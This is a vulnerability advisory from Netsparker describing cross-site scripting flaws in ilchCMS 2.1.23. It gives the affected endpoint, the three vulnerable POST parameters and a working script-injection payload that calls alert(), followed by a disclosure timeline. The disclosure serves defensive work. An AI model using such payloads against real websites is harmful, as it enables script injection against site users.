Information
--------------------

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in ilchCMS 2.1.23
Affected Software: ilchCMS
Affected Versions: 2.1.23
Vendor Homepage: https://www.ilch.de/
Vulnerability Type: Cross-site Scripting
Severity: Medium
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-016

Technical Details
--------------------

URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index
Parameter Name: Link
Parameter Type: Post
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>

URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index
Parameter Name: Name
Parameter Type: Post
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>

URL : http://{DOMAIN}/{PATH-OF-ILCHCMS}/index.php/partner/index
Parameter Name: Banner
Parameter Type: Post
Attack Pattern: '"@--></style></scRipt><scRipt>alert(0x00BFFE)</scRipt>

Note

  • Auth: No
  • Token: Yes

For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).

Advisory Timeline
--------------------

12th July 2019 - First Contact
16th July 2019 - Vendor Fixed
4th November 2019 - Advisory Released

Credits & Authors
--------------------

These issues have been discovered by Zekvan Arslan while testing the Netsparker Web Application Security Scanner.

About Netsparker
--------------------

Netsparker web application security scanner finds and reports security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engine’s unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities.